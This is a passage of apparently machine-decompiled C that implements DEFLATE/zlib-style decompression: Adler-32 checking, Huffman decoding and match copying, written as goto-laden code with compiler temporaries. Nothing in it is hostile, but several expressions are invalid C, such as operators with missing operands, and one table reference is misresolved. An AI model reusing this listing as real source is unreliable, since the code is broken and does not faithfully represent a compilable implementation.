											_v68 = _t1291;
											if(_v32 == 0) {
												L357:
												_t1350[7] = (_t1146 << 0x10) + _t1365;
												if(_t1113 == 0 && (_a20 & 0x00000001) != 0) {
													_t785 = 0xfffffffe;
													_t1113 =  !=  ? _t785 : _t1113;
												}
												goto L360;
											}
											_t1351 = 0xfff1;
											do {
												_t786 = 0;
												_a16 = 0;
												if(_t1291 <= 7) {
													L351:
													if(_t786 >= _t1291) {
														goto L355;
													}
													_t1116 = _a12;
													_t1296 = _t1291 - _t786;
													do {
														_t1365 = _t1365 + ( *_t1116 & 0x000000ff);
														_t1116 =  &(_t1116[1]);
														_t1146 = _t1146 + _t1365;
														_t1296 = _t1296 - 1;
													} while (_t1296 != 0);
													_a12 = _t1116;
													goto L355;
												}
												_t1352 = _a16;
												_push(7);
												_t795 = 0 - _a12;
												_v80 = _t795;
												_t1115 = _t795;
												do {
													_t1352 =  &(_t1352[2]);
													_t1366 = _t1365 + ( *_a12 & 0x000000ff);
													_t1367 = _t1366 + (_a12[1] & 0x000000ff);
													_t1368 = _t1367 + (_a12[2] & 0x000000ff);
													_t1369 = _t1368 + (_a12[3] & 0x000000ff);
													_t1370 = _t1369 + (_a12[4] & 0x000000ff);
													_t1371 = _t1370 + (_a12[5] & 0x000000ff);
													_t1372 = _t1371 + (_a12[6] & 0x000000ff);
													_t1365 = _t1372 + (_a12[7] & 0x000000ff);
													_t813 =  &(_a12[8]);
													_t1146 = _t1146 + _t1366 + _t1367 + _t1368 + _t1369 + _t1370 + _t1371 + _t1372 + _t1365;
													_a12 = _t813;
												} while ( &(_t813[_t1115]) < _t1291);
												_a16 = _t1352;
												_t786 = _t1352;
												_t1351 = 0xfff1;
												goto L351;
												L355:
												_t1365 = _t1365 % _t1351;
												_t792 = _v32 - _v68;
												_t1146 = _t1146 % _t1351;
												_t1291 = _a4;
												_v32 = _t792;
												_v68 = _t1291;
											} while (_t792 != 0);
											_t1113 = _v20;
											_t1350 = _v64;
											goto L357;
										}
									} else {
										L339:
										_t815 = _v76;
										while(_t1288 > _t815) {
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												goto L343;
											}
											_t1288 = _t1288 - 1;
											_t1364 = _t1364 - 8;
											__eflags = _t1364;
										}
										goto L343;
									}
								}
								_t1373 = _v12;
								_t816 = _t771 - _t1139;
								_t1157 = _v36 - _t1288;
								__eflags = _t816 - _t1157;
								_t1158 =  <  ? _t816 : _t1157;
								__eflags = _t1158 - _t1373;
								_t1374 =  <  ? _t1158 : _t1373;
								memcpy(_v32, _t1288, _t1374);
								_t1379 = _t1379 + 0xc;
								_t1288 = _v16 + _t1374;
								_t1139 = _v32 + _t1374;
								_t819 = _v12 - _t1374;
								__eflags = _t819;
								_v16 = _t1288;
								_t1364 = _v48;
								_v32 = _t1139;
								_v12 = _t819;
								L61:
								__eflags = _t819;
								if(_t819 != 0) {
									L279:
									_t771 = _v60;
									__eflags = _t1139 - _t771;
									if(_t1139 < _t771) {
										goto L59;
									}
									_t1113 = 2;
									_v20 = _t1113;
									 *_t1350 = 9;
									goto L339;
								}
								L62:
								__eflags = _t1350[5] & 0x00000001;
								if((_t1350[5] & 0x00000001) != 0) {
									__eflags = _t1364 - (_t1364 & 0x00000007);
									if(_t1364 >= (_t1364 & 0x00000007)) {
										_t1117 = _v8;
										L311:
										_t822 = _v76;
										_t1161 = _t1364 & 0x00000007;
										_t1118 = _t1117 >> _t1161;
										_t1364 = _t1364 - _t1161;
										__eflags = _t1288 - _t822;
										if(_t1288 <= _t822) {
											L315:
											_t823 = _t1364;
											asm("bts edx, eax");
											__eflags = _t823 - 0x20;
											_t1163 =  >=  ? 0 : 0;
											_t1299 = 0 ^ _t1163;
											__eflags = _t823 - 0x40;
											_t1164 =  >=  ? _t1299 : _t1163;
											_t1119 = _t1118 & _t1299 - 0x00000001;
											__eflags = _a20 & 0x00000001;
											_v8 = _t1119;
											if((_a20 & 0x00000001) == 0) {
												L332:
												_t1288 = _v16;
												L333:
												_t1113 = 0;
												 *_t1350 = 0x22;
												L18:
												_t772 = _v24;
												goto L337;
											}
											_t1165 = 0;
											__eflags = 0;
											L317:
											_v12 = _t1165;
											__eflags = _t1165 - 4;
											if(_t1165 >= 4) {
												goto L332;
											}
											__eflags = _t1364;
											if(_t1364 == 0) {
												_t1288 = _v16;
												L327:
												__eflags = _t1288 - _v36;
												if(_t1288 >= _v36) {
													 *_t1350 = 0x2a;
													goto L335;
												}
												_t1166 =  *_t1288 & 0x000000ff;
												_t1301 = _t1288 + 1;
												__eflags = _t1301;
												_v16 = _t1301;
												L329:
												_t1350[4] = _t1350[4] << 0x00000008 | _t1166;
												_t1165 = _v12 + 1;
												goto L317;
											}
											__eflags = _t1364 - 8;
											if(_t1364 >= 8) {
												L324:
												_t1166 = _t1119 & 0x000000ff;
												_t1119 = _t1119 >> 8;
												_t1364 = _t1364 - 8;
												_v8 = _t1119;
												goto L329;
											}
											_t1288 = _v16;
											while(1) {
												L322:
												__eflags = _t1288 - _v36;
												if(_t1288 >= _v36) {
													break;
												}
												_t828 = ( *_t1288 & 0x000000ff) << _t1364;
												_t1288 = _t1288 + 1;
												_t1119 = _t1119 | _t828;
												_v16 = _t1288;
												_t1364 = _t1364 + 8;
												_v8 = _t1119;
												__eflags = _t1364 - 8;
												if(_t1364 < 8) {
													continue;
												}
												goto L324;
											}
											 *_t1350 = 0x29;
											goto L335;
										} else {
											goto L312;
										}
										while(1) {
											L312:
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												break;
											}
											_t1288 = _t1288 - 1;
											_t1364 = _t1364 - 8;
											__eflags = _t1288 - _t822;
											if(_t1288 > _t822) {
												continue;
											}
											break;
										}
										_v16 = _t1288;
										goto L315;
									} else {
										goto L306;
									}
									while(1) {
										L306:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t1169 = _t1364;
										_t1364 = _t1364 + 8;
										_t830 = ( *_t1288 & 0x000000ff) << _t1169;
										_t1288 = _t1288 + 1;
										_t1117 = _v8 | _t830;
										_v16 = _t1288;
										_v8 = _t1117;
										__eflags = _t1364 - (_t1364 & 0x00000007);
										if(_t1364 < (_t1364 & 0x00000007)) {
											continue;
										}
										goto L311;
									}
									 *_t1350 = 0x20;
									goto L335;
								}
								L63:
								_t1170 = _v8;
								L66:
								__eflags = _t1364 - 3;
								if(_t1364 < 3) {
									L64:
									__eflags = _t1288 - _v36;
									if(_t1288 >= _v36) {
										 *_t1350 = 3;
										goto L335;
									}
									_t834 = ( *_t1288 & 0x000000ff) << _t1364;
									_t1288 = _t1288 + 1;
									_t1170 = _v8 | _t834;
									_v16 = _t1288;
									_v8 = _t1170;
									_t1364 = _t1364 + 8;
									__eflags = _t1364;
									goto L66;
								}
								_t1364 = _t1364 - 3;
								_t836 = _t1170 & 0x00000007;
								_t1350[5] = _t836;
								_t837 = _t836 >> 1;
								__eflags = _t837;
								_v8 = _t1170 >> 3;
								_v48 = _t1364;
								_t1350[6] = _t837;
								if(_t837 == 0) {
									L253:
									__eflags = _t1364 - (_t1364 & 0x00000007);
									if(_t1364 < (_t1364 & 0x00000007)) {
										L251:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											 *_t1350 = 5;
											goto L335;
										}
										_t841 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t841;
										_t1364 = _t1364 + 8;
										__eflags = _t1364;
										_v16 = _t1288;
										goto L253;
									}
									_t1176 = _t1364 & 0x00000007;
									_t843 = _v8 >> _t1176;
									_t1364 = _t1364 - _t1176;
									_v8 = _t843;
									_t1177 = 0;
									__eflags = 0;
									_v48 = _t1364;
									L255:
									_v12 = _t1177;
									__eflags = _t1177 - 4;
									if(_t1177 >= 4) {
										_v12 = (_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff;
										_t819 = _v12;
										__eflags = _t819 - (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff);
										if(_t819 != (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
											L304:
											_v20 = _t1113;
											 *_t1350 = 0x27;
											goto L339;
										}
										_t1139 = _v32;
										L267:
										__eflags = _t819;
										if(_t819 == 0) {
											goto L62;
										}
										__eflags = _t1364;
										if(_t1364 == 0) {
											goto L61;
										}
										__eflags = _t1364 - 8;
										if(_t1364 >= 8) {
											_t1185 = _v8;
											L274:
											_t846 = _t1185 & 0x000000ff;
											_t1364 = _t1364 - 8;
											_v44 = _t846;
											_v8 = _t1185 >> 8;
											_v48 = _t1364;
											L276:
											_t1187 = _v32;
											__eflags = _t1187 - _v60;
											if(_t1187 >= _v60) {
												_t1113 = 2;
												_v20 = _t1113;
												 *_t1350 = 0x34;
												goto L339;
											}
											 *_t1187 = _t846;
											_t1139 =  &(_t1187[0]);
											_t819 = _v12 - 1;
											_v32 = _t1139;
											_v12 = _t819;
											goto L267;
										} else {
											goto L270;
										}
										while(1) {
											L270:
											__eflags = _t1288 - _v36;
											if(_t1288 >= _v36) {
												break;
											}
											_t849 = ( *_t1288 & 0x000000ff) << _t1364;
											_t1288 = _t1288 + 1;
											_t1364 = _t1364 + 8;
											_t1185 = _v8 | _t849;
											_v16 = _t1288;
											_v8 = _t1185;
											__eflags = _t1364 - 8;
											if(_t1364 < 8) {
												continue;
											}
											goto L274;
										}
										 *_t1350 = 0x33;
										goto L335;
									}
									__eflags = _t1364;
									if(_t1364 == 0) {
										L262:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											 *_t1350 = 7;
											goto L335;
										}
										_t850 =  *_t1288;
										_t1288 = _t1288 + 1;
										__eflags = _t1288;
										 *(_t1177 +  &(_t1350[0xa48])) = _t850;
										_t843 = _v8;
										_v16 = _t1288;
										L264:
										_t1177 = _t1177 + 1;
										goto L255;
									}
									__eflags = _t1364 - 8;
									if(_t1364 >= 8) {
										L261:
										 *(_t1177 +  &(_t1350[0xa48])) = _t843;
										_t843 = _t843 >> 8;
										_t1364 = _t1364 - 8;
										_v8 = _t843;
										_v48 = _t1364;
										goto L264;
									} else {
										goto L258;
									}
									while(1) {
										L258:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t852 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t852;
										_t1364 = _t1364 + 8;
										_v16 = _t1288;
										__eflags = _t1364 - 8;
										if(_t1364 < 8) {
											continue;
										}
										_t1177 = _v12;
										_t843 = _v8;
										goto L261;
									}
									 *_t1350 = 6;
									goto L335;
								}
								__eflags = _t837 - 3;
								if(_t837 == 3) {
									L298:
									_v20 = _t1113;
									 *_t1350 = 0xa;
									goto L339;
								}
								__eflags = _t837 - _v24;
								if(_t837 != _v24) {
									_t1191 = 0;
									__eflags = 0;
									L72:
									_v12 = _t1191;
									__eflags = _t1191 - 3;
									if(_t1191 < 3) {
										L83:
										_t146 = _t1191 + 0x411014; // 0x40505
										_t853 =  *_t146;
										_v28 = _t853;
										__eflags = _t1364 - _t853;
										if(_t1364 < _t853) {
											L81:
											__eflags = _t1288 - _v36;
											if(_t1288 >= _v36) {
												 *_t1350 = 0xb;
												goto L335;
											}
											_t855 = ( *_t1288 & 0x000000ff) << _t1364;
											_t1288 = _t1288 + 1;
											_v8 = _v8 | _t855;
											_t1364 = _t1364 + 8;
											__eflags = _t1364;
											_t1191 = _v12;
											_v16 = _t1288;
											goto L83;
										}
										_t1302 =  &(_t1350[_t1191]);
										_t1302[0xb] = (_v24 << _v28) - 0x00000001 & _v8;
										_t155 = _v12 + 0x411014; // 0x40505
										_t1194 =  *_t155;
										_v8 = _v8 >> _t1194;
										_t1364 = _t1364 - _t1194;
										_t1195 = _v12;
										_v48 = _t1364;
										_t1302[0xb] = _t1302[0xb] +  *((intOrPtr*)(0x411a48 + _t1195 * 4));
										_t1191 = _t1195 + 1;
										_t1288 = _v16;
										goto L72;
									}
									memset( &(_t1350[0x6e0]), 0, 0x120);
									_t1303 = _v8;
									_t1379 = _t1379 + 0xc;
									_t864 = 0;
									__eflags = 0;
									L74:
									_v12 = _t864;
									__eflags = _t864 - _t1350[0xd];
									if(_t864 >= _t1350[0xd]) {
										_t1350[0xd] = 0x13;
										L86:
										_t865 = _t1350[6];
										__eflags = _t865;
										if(_t865 < 0) {
											L153:
											_t1288 = _v16;
											L154:
											_t1197 = _v36 - _t1288;
											__eflags = _t1197 - 4;
											if(_t1197 < 4) {
												L173:
												__eflags = _t1364 - 0xf;
												if(_t1364 >= 0xf) {
													L178:
													_t1198 = _v8;
													L179:
													_t868 =  *((short*)(_t1350 + 0x160 + (_t1198 & 0x000003ff) * 2));
													_v12 = _t868;
													__eflags = _t868;
													if(_t868 < 0) {
														_t1199 = 0xa;
														do {
															_v12 =  !_v12;
															_t872 = (_v8 >> _t1199 & 0x00000001) + _v12;
															_t1199 = _t1199 + 1;
															_t873 =  *((short*)(_t1350 + 0x960 + _t872 * 2));
															_v12 = _t873;
															__eflags = _t873;
														} while (_t873 < 0);
														L191:
														_v8 = _v8 >> _t1199;
														_t1364 = _t1364 - _t1199;
														__eflags = _t873 - 0x100;
														if(_t873 >= 0x100) {
															L198:
															_t874 = _t873 & 0x000001ff;
															_v12 = _t874;
															__eflags = _t874 - 0x100;
															if(_t874 == 0x100) {
																goto L62;
															}
															_t875 = _t874 * 4 - 0x404;
															_t1200 =  *(_t875 + 0x411020);
															_v56 = _t1200;
															_v12 =  *((intOrPtr*)(_t875 + 0x411a58));
															__eflags = _t1200;
															if(_t1200 == 0) {
																L205:
																__eflags = _t1364 - 0xf;
																if(_t1364 >= 0xf) {
																	L210:
																	_t1201 = _v8;
																	L211:
																	_t879 =  *((short*)(_t1350 + 0xf00 + (_t1201 & 0x000003ff) * 2));
																	_v28 = _t879;
																	__eflags = _t879;
																	if(_t879 < 0) {
																		_t1121 = _v28;
																		_t1321 = _v8;
																		_t1202 = 0xa;
																		do {
																			_t883 = (_t1321 >> _t1202 & 0x00000001) +  !_t1121;
																			_t1202 = _t1202 + 1;
																			_t1121 =  *((short*)(_t1350 + 0x1700 + _t883 * 2));
																			__eflags = _t1121;
																		} while (_t1121 < 0);
																		_t1288 = _v16;
																		_v28 = _t1121;
																		_t1113 = _t1121 | 0xffffffff;
																		__eflags = _t1113;
																		_t884 = _v28;
																		L224:
																		_v8 = _v8 >> _t1202;
																		_t1364 = _t1364 - _t1202;
																		_t1203 =  *(0x4110a0 + _t884 * 4);
																		_t885 =  *((intOrPtr*)(0x411120 + _t884 * 4));
																		_v56 = _t1203;
																		_v44 = _t885;
																		__eflags = _t1203;
																		if(_t1203 == 0) {
																			L230:
																			_t1205 = _v32 - _a8;
																			_v72 = _t1205;
																			__eflags = _t885 - _t1205;
																			if(_t885 <= _t1205) {
																				L232:
																				_t1350 = _v64;
																				_t1208 = (_t1205 - _t885 & _v68) + _a8;
																				__eflags = _v32 - _t1208;
																				_t887 =  >  ? _v32 : _t1208;
																				_t888 = ( >  ? _v32 : _t1208) + _v12;
																				__eflags = ( >  ? _v32 : _t1208) + _v12 - _v60;
																				if(( >  ? _v32 : _t1208) + _v12 <= _v60) {
																					_t889 = _v12;
																					__eflags = _t889 - 9;
																					if(_t889 < 9) {
																						L246:
																						_t1322 = _v32;
																						do {
																							_t890 =  *_t1208;
																							_t1208 = _t1208 + 3;
																							 *_t1322 = _t890;
																							 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 - 2));
																							 *((char*)(_t1322 + 2)) =  *((intOrPtr*)(_t1208 - 1));
																							_t1322 = _t1322 + 3;
																							_t894 = _v12 - 3;
																							_v12 = _t894;
																							__eflags = _t894 - 2;
																						} while (_t894 > 2);
																						_v32 = _t1322;
																						__eflags = _t894;
																						if(_t894 <= 0) {
																							goto L153;
																						}
																						 *_t1322 =  *_t1208;
																						_t934 = _v12;
																						__eflags = _t934 - 1;
																						if(_t934 <= 1) {
																							L245:
																							_v32 = _t1322 + _t934;
																							goto L153;
																						}
																						L244:
																						 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 + 1));
																						_t934 = _v12;
																						goto L245;
																					}
																					__eflags = _t889 - _v44;
																					if(_t889 > _v44) {
																						goto L246;
																					}
																					_t1126 = _v32;
																					_t1326 = (_t889 & 0xfffffff8) + _t1208;
																					__eflags = _t1326;
																					do {
																						 *_t1126 =  *_t1208;
																						_t937 =  *((intOrPtr*)(_t1208 + 4));
																						_t1208 = _t1208 + 8;
																						 *((intOrPtr*)(_t1126 + 4)) = _t937;
																						_t1126 = _t1126 + 8;
																						__eflags = _t1208 - _t1326;
																					} while (_t1208 < _t1326);
																					_t939 = _v12 & 0x00000007;
																					_v32 = _t1126;
																					_t1113 = _t1126 | 0xffffffff;
																					_v12 = _t939;
																					__eflags = _t939 - 3;
																					if(_t939 >= 3) {
																						goto L246;
																					}
																					__eflags = _t939;
																					if(_t939 == 0) {
																						goto L153;
																					}
																					_t1322 = _v32;
																					 *_t1322 =  *_t1208;
																					_t934 = _v12;
																					__eflags = _t934 - 1;
																					if(_t934 <= 1) {
																						goto L245;
																					}
																					goto L244;
																				}
																				_t1138 = _v12;
																				L234:
																				_t941 = _t1138;
																				_t1138 = _t1138 - 1;
																				_v12 = _t1138;
																				__eflags = _t941;
																				if(_t941 == 0) {
																					goto L153;
																				}
																				L235:
																				__eflags = _v32 - _v60;
																				if(_v32 >= _v60) {
																					_t1113 = 2;
																					_v20 = _t1113;
																					 *_t1350 = 0x35;
																					goto L339;
																				}
																				_v32 = _v32 + 1;
																				_v72 = _v72 + 1;
																				 *_v32 =  *((intOrPtr*)((_v72 - _v44 & _v68) + _a8));
																				_t1350 = _v64;
																				goto L234;
																			}
																			__eflags = _a20 & 0x00000004;
																			if((_a20 & 0x00000004) != 0) {
																				L296:
																				_v20 = _t1113;
																				 *_t1350 = 0x25;
																				goto L339;
																			}
																			goto L232;
																		}
																		L228:
																		__eflags = _t1364 - _t1203;
																		if(_t1364 < _t1203) {
																			L226:
																			__eflags = _t1288 - _v36;
																			if(_t1288 >= _v36) {
																				 *_t1350 = 0x1b;
																				goto L335;
																			}
																			_t948 = ( *_t1288 & 0x000000ff) << _t1364;
																			_t1288 = _t1288 + 1;
																			_v8 = _v8 | _t948;
																			_t1364 = _t1364 + 8;
																			__eflags = _t1364;
																			_t1203 = _v56;
																			_v16 = _t1288;
																			goto L228;
																		}
																		_t1364 = _t1364 - _t1203;
																		_v8 = _v8 >> _t1203;
																		_t534 =  &_v44;
																		 *_t534 = _v44 + ((_v24 << _t1203) - 0x00000001 & _v8);
																		__eflags =  *_t534;
																		_t885 = _v44;
																		goto L230;
																	}
																	_t1202 = _t879 >> 9;
																	_t884 = _t879 & 0x000001ff;
																	goto L224;
																}
																__eflags = _v36 - _t1288 - 2;
																if(_v36 - _t1288 >= 2) {
																	_t502 = _t1288 + 1; // 0x83c84d8d
																	_t1201 = _v8 | ( *_t502 & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
																	_t1288 = _v16 + 2;
																	_v8 = _t1201;
																	_v16 = _t1288;
																	_t1364 = _t1364 + 0x10;
																	goto L211;
																}
																L207:
																_t960 =  *((short*)(_t1350 + 0xf00 + (_v8 & 0x000003ff) * 2));
																_v40 = _t960;
																__eflags = _t960;
																if(_t960 < 0) {
																	__eflags = _t1364 - 0xa;
																	if(_t1364 <= 0xa) {
																		L217:
																		__eflags = _t1288 - _v36;
																		if(_t1288 >= _v36) {
																			 *_t1350 = 0x1a;
																			goto L335;
																		}
																		_t962 = ( *_t1288 & 0x000000ff) << _t1364;
																		_t1288 = _t1288 + 1;
																		_t1364 = _t1364 + 8;
																		_t1201 = _v8 | _t962;
																		_v16 = _t1288;
																		_v8 = _t1201;
																		__eflags = _t1364 - 0xf;
																		if(_t1364 < 0xf) {
																			goto L207;
																		}
																		goto L211;
																	}
																	_t1216 = 0xa;
																	_v28 = _t1216;
																	while(1) {
																		_t1219 =  *((short*)(_t1350 + 0x1700 + ((_v8 >> _t1216 & _v24) +  !_v40) * 2));
																		_t968 = _v28 + 1;
																		_v40 = _t1219;
																		_v28 = _t968;
																		__eflags = _t1219;
																		if(_t1219 >= 0) {
																			goto L210;
																		}
																		_t1216 = _v28;
																		__eflags = _t1364 - _t968 + 1;
																		if(_t1364 >= _t968 + 1) {
																			continue;
																		}
																		goto L217;
																	}
																	goto L210;
																}
																_t970 = _t960 >> 9;
																__eflags = _t970;
																if(_t970 == 0) {
																	goto L217;
																}
																__eflags = _t1364 - _t970;
																if(_t1364 < _t970) {
																	goto L217;
																}
																goto L210;
															}
															L203:
															__eflags = _t1364 - _t1200;
															if(_t1364 < _t1200) {
																L201:
																__eflags = _t1288 - _v36;
																if(_t1288 >= _v36) {
																	 *_t1350 = 0x19;
																	goto L335;
																}
																_t972 = ( *_t1288 & 0x000000ff) << _t1364;
																_t1288 = _t1288 + 1;
																_v8 = _v8 | _t972;
																_t1364 = _t1364 + 8;
																__eflags = _t1364;
																_t1200 = _v56;
																_v16 = _t1288;
																goto L203;
															}
															_t1364 = _t1364 - _t1200;
															_v8 = _v8 >> _t1200;
															_t474 =  &_v12;
															 *_t474 = _v12 + ((_v24 << _t1200) - 0x00000001 & _v8);
															__eflags =  *_t474;
															goto L205;
														}
														L194:
														_t1221 = _v32;
														__eflags = _t1221 - _v60;
														if(_t1221 >= _v60) {
															_t1113 = 2;
															_v20 = _t1113;
															 *_t1350 = 0x18;
															goto L339;
														}
														 *_t1221 = _t873;
														_t1222 =  &(_t1221[0]);
														__eflags = _t1222;
														L196:
														_v32 = _t1222;
														goto L154;
													}
													_t1199 = _t868 >> 9;
													_t873 = _t868 & 0x000001ff;
													_v12 = _t873;
													goto L191;
												}
												__eflags = _t1197 - 2;
												if(_t1197 >= 2) {
													_t1198 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
													_t1288 = _v16 + 2;
													_v8 = _t1198;
													_v16 = _t1288;
													_t1364 = _t1364 + 0x10;
													goto L179;
												}
												L175:
												_t900 =  *((short*)(_t1350 + 0x160 + (_v8 & 0x000003ff) * 2));
												_v40 = _t900;
												__eflags = _t900;
												if(_t900 < 0) {
													__eflags = _t1364 - 0xa;
													if(_t1364 <= 0xa) {
														L185:
														__eflags = _t1288 - _v36;
														if(_t1288 >= _v36) {
															 *_t1350 = 0x17;
															goto L335;
														}
														_t902 = ( *_t1288 & 0x000000ff) << _t1364;
														_t1288 = _t1288 + 1;
														_t1364 = _t1364 + 8;
														_t1198 = _v8 | _t902;
														_v16 = _t1288;
														_v8 = _t1198;
														__eflags = _t1364 - 0xf;
														if(_t1364 < 0xf) {
															goto L175;
														}
														goto L179;
													}
													_t1229 = 0xa;
													_v28 = _t1229;
													while(1) {
														_t1232 =  *((short*)(_t1350 + 0x960 + ((_v8 >> _t1229 & _v24) +  !_v40) * 2));
														_t908 = _v28 + 1;
														_v40 = _t1232;
														_v28 = _t908;
														__eflags = _t1232;
														if(_t1232 >= 0) {
															goto L178;
														}
														_t1229 = _v28;
														__eflags = _t1364 - _t908 + 1;
														if(_t1364 >= _t908 + 1) {
															continue;
														}
														goto L185;
													}
													goto L178;
												}
												_t910 = _t900 >> 9;
												__eflags = _t910;
												if(_t910 == 0) {
													goto L185;
												}
												__eflags = _t1364 - _t910;
												if(_t1364 < _t910) {
													goto L185;
												}
												goto L178;
											}
											_t1113 = 0xffffffff;
											__eflags = _v60 - _v32 - 2;
											if(_v60 - _v32 < 2) {
												goto L173;
											}
											__eflags = _t1364 - 0xf;
											if(_t1364 >= 0xf) {
												_t913 = _v8;
											} else {
												_t913 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
												_t1288 = _v16 + 2;
												_v8 = _t913;
												_v16 = _t1288;
												_t1364 = _t1364 + 0x10;
											}
											_t915 =  *((short*)(_t1350 + 0x160 + (_t913 & 0x000003ff) * 2));
											_v12 = _t915;
											__eflags = _t915;
											if(_t915 < 0) {
												_t1233 = 0xa;
												do {
													_v12 =  !_v12;
													_t919 = (_v8 >> _t1233 & 0x00000001) + _v12;
													_t1233 = _t1233 + 1;
													_t873 =  *((short*)(_t1350 + 0x960 + _t919 * 2));
													_v12 = _t873;
													__eflags = _t873;
												} while (_t873 < 0);
												goto L163;
											} else {
												_t1233 = _t915 >> 9;
												L163:
												_v8 = _v8 >> _t1233;
												_t1364 = _t1364 - _t1233;
												__eflags = _t873 & 0x00000100;
												if((_t873 & 0x00000100) != 0) {
													goto L198;
												}
												__eflags = _t1364 - 0xf;
												if(_t1364 >= 0xf) {
													_t920 = _v8;
												} else {
													_t920 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
													_t1288 = _v16 + 2;
													_v8 = _t920;
													_v16 = _t1288;
													_t1364 = _t1364 + 0x10;
												}
												_t922 =  *((short*)(_t1350 + 0x160 + (_t920 & 0x000003ff) * 2));
												_v28 = _t922;
												__eflags = _t922;
												if(_t922 < 0) {
													_t1234 = 0xa;
													_v40 = _t1234;
													do {
														_t926 = (_v8 >> _t1234 & _v24) +  !_v28;
														_t1234 = _v40 + 1;
														_v40 = _t1234;
														_t873 =  *((short*)(_t1350 + 0x960 + _t926 * 2));
														_v28 = _t873;
														__eflags = _t873;
													} while (_t873 < 0);
													goto L171;
												} else {
													_t1234 = _t922 >> 9;
													L171:
													_t1364 = _t1364 - _t1234;
													_v8 = _v8 >> _t1234;
													 *_v32 = _v12;
													_t1113 = 0xffffffff;
													__eflags = _t873 & 0x00000100;
													if((_t873 & 0x00000100) != 0) {
														_t456 =  &_v32;
														 *_t456 = _v32 + 1;
														__eflags =  *_t456;
														goto L198;
													}
													_t1239 = _v32;
													 *(_t1239 + 1) = _t873;
													_t1222 = _t1239 + 2;
													goto L196;
												}
											}
										}
										_v20 = 0x40 + _t865 * 0xda0 + _t1350;
										memset( &_v212, 0, 0x40);
										memset(_v20 + 0x120, 0, 0x800);
										memset(_v20 + 0x920, 0, 0x480);
										_t1304 = _t1350[6];
										_t1244 = 0;
										_t1379 = _t1379 + 0x24;
										__eflags =  *(_t1350 + 0x2c + _t1304 * 4);
										if( *(_t1350 + 0x2c + _t1304 * 4) <= 0) {
											L91:
											_v28 = _v28 & 0x00000000;
											_t1245 = 0;
											_v144 = _v144 & 0;
											_t189 =  &_v148;
											 *_t189 = _v148 & 0;
											__eflags =  *_t189;
											_t1305 = 4;
											do {
												_t988 =  *((intOrPtr*)(_t1378 + _t1305 - 0xd0));
												_v28 = _v28 + _t988;
												_t1245 = _t1245 + _t988 + _t1245 + _t988;
												 *((intOrPtr*)(_t1378 + _t1305 - 0x8c)) = _t1245;
												_t1305 = _t1305 + 4;
												__eflags = _t1305 - 0x3c;
											} while (_t1305 <= 0x3c);
											__eflags = _t1245 - 0x10000;
											if(_t1245 == 0x10000) {
												L95:
												_t989 = _t1350[6];
												_v52 = _v52 & 0x00000000;
												_v40 = _t1113;
												__eflags =  *(_t1350 + 0x2c + _t989 * 4);
												if( *(_t1350 + 0x2c + _t989 * 4) <= 0) {
													L117:
													__eflags = _t1350[6] - 2;
													if(_t1350[6] != 2) {
														L152:
														_t1350[6] = _t1350[6] - 1;
														goto L86;
													}
													_t1247 = 0;
													__eflags = 0;
													L119:
													_v12 = _t1247;
													__eflags = _t1247 - _t1350[0xc] + _t1350[0xb];
													if(_t1247 >= _t1350[0xc] + _t1350[0xb]) {
														__eflags = _t1350[0xc] + _t1350[0xb] - _t1247;
														if(_t1350[0xc] + _t1350[0xb] != _t1247) {
															_t1288 = _v16;
															L290:
															_v20 = _t1113;
															 *_t1350 = 0x15;
															goto L339;
														}
														memcpy( &(_t1350[0x10]),  &(_t1350[0xa49]), _t1350[0xb]);
														_t999 = _t1350[0xb] + 0x2924 + _t1350;
														__eflags = _t999;
														memcpy( &(_t1350[0x378]), _t999, _t1350[0xc]);
														_t1379 = _t1379 + 0x18;
														goto L152;
													}
													_t1288 = _v16;
													__eflags = _t1364 - 0xf;
													if(_t1364 >= 0xf) {
														L125:
														_t1248 = _v8;
														L126:
														_t1004 =  *((short*)(_t1350 + 0x1ca0 + (_t1248 & 0x000003ff) * 2));
														_v44 = _t1004;
														__eflags = _t1004;
														if(_t1004 < 0) {
															_t1249 = 0xa;
															do {
																_v44 =  !_v44;
																_t1008 = (_v8 >> _t1249 & 0x00000001) + _v44;
																_t1249 = _t1249 + 1;
																_t1009 =  *((short*)(_t1350 + 0x24a0 + _t1008 * 2));
																_v44 = _t1009;
																__eflags = _t1009;
															} while (_t1009 < 0);
															L138:
															_t1364 = _t1364 - _t1249;
															_t1011 = _v8 >> _t1249;
															_t1250 = _v44;
															_v8 = _t1011;
															_v48 = _t1364;
															__eflags = _t1250 - 0x10;
															if(__eflags >= 0) {
																if(__eflags != 0) {
																	L142:
																	_t1251 =  *((char*)(_t1250 +  &__imp__IsProcessorFeaturePresent));
																	_v56 = _t1251;
																	__eflags = _t1364 - _t1251;
																	if(_t1364 >= _t1251) {
																		L146:
																		_t1364 = _t1364 - _t1251;
																		_v48 = _t1364;
																		_t1252 = _v44;
																		_v8 = _t1011 >> _t1251;
																		_t336 = _t1252 + 0x411008; // 0x0
																		_t1310 = ((_v24 << _t1251) - 0x00000001 & _t1011) +  *_t336;
																		_t1014 = _v12;
																		_v52 = _t1310;
																		__eflags = _v44 - 0x10;
																		if(_v44 != 0x10) {
																			_t1253 = 0;
																			__eflags = 0;
